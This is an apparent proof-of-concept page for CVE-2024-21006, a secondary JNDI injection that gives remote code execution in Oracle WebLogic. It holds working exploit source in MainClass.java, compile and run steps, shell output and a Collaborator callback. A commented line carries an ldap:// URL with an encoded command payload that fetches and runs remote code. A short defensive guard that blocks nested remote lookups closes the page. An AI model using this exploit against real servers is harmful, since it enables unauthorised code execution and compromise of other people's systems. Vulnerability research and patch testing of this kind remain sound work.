# WebLogic - CVE-2024-21006

CVE-2024-21006 reveals a new WebLogic attack method, secondary JNDI injection: a second JNDI injection is triggered while the first JNDI injection is being processed, which completes **RCE**.

This project is based on the findings of [pwnull](https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/) and code from [momika233](https://github.com/momika233/CVE-2024-21006).

## Proof-of-Concept

### Oracle WebLogic 14.1.1.0

```bash
apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic
```

Prepare the environment by uploading `MainClass.java` and `META-INF/MANIFEST.MF` to the WebLogic container.

```bash
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/
```

Compile the code against `weblogic.jar` and package it as a runnable JAR.

```bash
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java

[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
```

Run the JAR and answer the prompts.

```bash
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com
```

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FA7G1sLmBB4cT9Dn1njZr%2Fimage.png?alt=media&#x26;token=03c9c7bc-9995-4331-9bd3-790e7c504e83" alt=""><figcaption><p>Burp Collaborator callback indicating a successful exploit attempt</p></figcaption></figure>

## Source code

```java
// MainClass.java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;

public class MainClass {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(System.in);
        System.out.print("Target IP: ");
        String ip = scanner.nextLine();
        System.out.print("Target Port: ");
        String port = scanner.nextLine();
        System.out.print("RMI Address (ip:port/exp): ");
        String rmiexp = scanner.nextLine();
        Random bindname = new Random();
        int bindint = bindname.nextInt(10000);
//        String ip = "127.0.0.1";
//        String port = "7001";
//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        // wlserver/server/lib/weblogic.jar must be on the classpath, otherwise this fails.
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }

            @Override
            public void addDescription(String s) {

            }

            @Override
            public void removeDescription(String s) {

            }

            @Override
            public void setDescriptions(String[] strings) {

            }

            @Override
            public String getMessageDestinationRefName() {
                return null;
            }

            @Override
            public void setMessageDestinationRefName(String s) {

            }

            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }

            @Override
            public void setMessageDestinationType(String s) {

            }

            @Override
            public String getMessageDestinationUsage() {
                return null;
            }

            @Override
            public void setMessageDestinationUsage(String s) {

            }

            @Override
            public String getMessageDestinationLink() {
                return null;
            }

            @Override
            public void setMessageDestinationLink(String s) {

            }

            @Override
            public String getMappedName() {
                return null;
            }

            @Override
            public void setMappedName(String s) {

            }

            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }

            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }

            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {

            }

            @Override
            public String getLookupName() {
                return null;
            }

            @Override
            public void setLookupName(String s) {

            }

            @Override
            public String getId() {
                return null;
            }

            @Override
            public void setId(String s) {

            }
        }, "ldap://" + rmiexp, null, null);

        // Bind the reference under a randomized name, then look the same name up.
        context.bind("pthree" + bindint, messageDestinationReference);
        context.lookup("pthree" + bindint);
    }
}
```

`META-INF/MANIFEST.MF`:

```text
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar
```
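
The nested resolution behind a secondary JNDI injection, as an added illustration that is not WebLogic's code, Oracle's patch, or part of the original PoC: a factory resolves a name carried in a bound `Reference`, and a guard rejects any name whose scheme would select a remote provider. `GuardedFactory`, the `target` address type and the in-memory `localTree` are hypothetical stand-ins, and the sample names are constructed.

```java
import javax.naming.*;
import javax.naming.spi.ObjectFactory;
import java.util.*;

public class SecondaryLookupGuard {

    // Mirrors how javax.naming.InitialContext detects a URL name: a ':' that
    // appears before any '/' marks everything in front of it as the scheme.
    static String urlScheme(String name) {
        int colon = name.indexOf(':');
        int slash = name.indexOf('/');
        return (colon > 0 && (slash == -1 || colon < slash)) ? name.substring(0, colon) : null;
    }

    // Hypothetical factory: the Reference carries a "target" address that the
    // factory resolves itself. That nested resolution is the secondary lookup.
    public static class GuardedFactory implements ObjectFactory {
        private final Map<String, Object> localTree; // stand-in for the server's own JNDI tree
        public GuardedFactory(Map<String, Object> localTree) { this.localTree = localTree; }
        @Override
        public Object getObjectInstance(Object obj, Name n, Context c, Hashtable<?, ?> env)
                throws NamingException {
            if (!(obj instanceof Reference)) return null;
            RefAddr addr = ((Reference) obj).get("target");
            if (addr == null) return null;
            String target = String.valueOf(addr.getContent());
            String scheme = urlScheme(target);
            // Unguarded code would call new InitialContext().lookup(target) here,
            // letting the bound object choose an ldap:// or rmi:// provider.
            if (scheme != null && !scheme.equals("java")) {
                throw new NamingException("refusing nested lookup, scheme: " + scheme);
            }
            Object found = localTree.get(target);
            if (found == null) throw new NameNotFoundException(target);
            return found;
        }
    }

    public static void main(String[] args) throws Exception {
        Map<String, Object> tree = new HashMap<>();
        tree.put("java:comp/env/jms/orders", "local-queue"); // constructed sample entry
        ObjectFactory f = new GuardedFactory(tree);
        for (String t : new String[] {"java:comp/env/jms/orders", "ldap://198.51.100.7/x"}) {
            Reference ref = new Reference("java.lang.Object", new StringRefAddr("target", t));
            try { System.out.println(t + " -> " + f.getObjectInstance(ref, null, null, null)); }
            catch (NamingException e) { System.out.println(t + " -> " + e.getMessage()); }
        }
    }
}
```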
